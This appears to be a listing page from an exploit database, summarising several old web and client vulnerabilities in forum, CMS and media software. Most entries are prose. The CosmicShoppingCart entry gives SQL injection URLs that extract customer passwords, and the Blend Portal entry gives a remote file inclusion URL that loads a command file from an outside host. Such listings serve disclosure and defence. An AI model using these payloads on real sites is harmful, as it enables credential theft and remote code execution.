header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

TinyPHP forum <= 3.6 Remote Command Execution Exploit

This exploit allows an attacker to execute arbitrary commands on a vulnerable server running TinyPHP forum version 3.6. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'uname' parameter of the 'profile.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious PHP code to the vulnerable server. The malicious code will be written to the server's log file, which can then be accessed by the attacker to execute arbitrary commands on the server.

Internet Shortcut URL Buffer Overflow Vulnerability

Internet Shortcut URL Buffer Overflow Vulnerability is a buffer overflow vulnerability in the Internet Shortcut URL (BASEURL) field of the .URL file. An attacker can exploit this vulnerability by crafting a malicious .URL file with a specially crafted BASEURL field that contains more than 2083 characters. This will cause a buffer overflow, resulting in arbitrary code execution on the target system.

gxine – HTTP Plugin Remote Buffer Overflow PoC

This PoC exploits a buffer overflow vulnerability in the HTTP plugin of gxine 0.5.6. The vulnerability is triggered when a large amount of data is sent to the server. This causes a stack-based buffer overflow, which can be exploited to execute arbitrary code. The vulnerable code is located in the free() function of /lib/tls/libc.so.6. The backtrace of the vulnerable code is 0xb78eccc7 in free () from /lib/tls/libc.so.6, 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so, 0x41414141 in ?? (), 0xb7f42164 in ?? () from /usr/lib/libxine.so.1, 0x080b1810 in ?? (), 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1, 0xb7f3967f in ?? () from /usr/lib/libxine.so.1, 0x0877c084 in ?? (), 0x0930a931 in ?? (), 0x080880a2 in defs.3 (), 0xb0088478 in ?? () and 0x00000000 in ?? ().

Speedy Forum User Pass Change

This exploit allows an attacker to change the user password of a Speedy Forum user by submitting a form with the user's name, email, ID, country, password, and re-password. The form does not have any authentication or authorization checks, allowing an attacker to change the user's password without their knowledge.

Fastpublish CMS v 1.6.9.d – Remote File Include Vulnerabilities

Fastpublish CMS version 1.6.9.d is vulnerable to remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

CosmicShoppingCart SQL Injection Vulnerability

SQL injections have been found in CosmicShoppingCart, a PHP/MySQL e-commerce system. These injections could be exploited by users to retrieve the passwords of the admin. Examples of the injections are: cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/* and cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--

Blend Portal <= 1.2.0 for phpBB 2.x Remote File Inclusion Vulnerabilities

This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x. Succesful exploitation needs register_globals on & allow url_fopen on. GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]. EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?

Recent Exploits: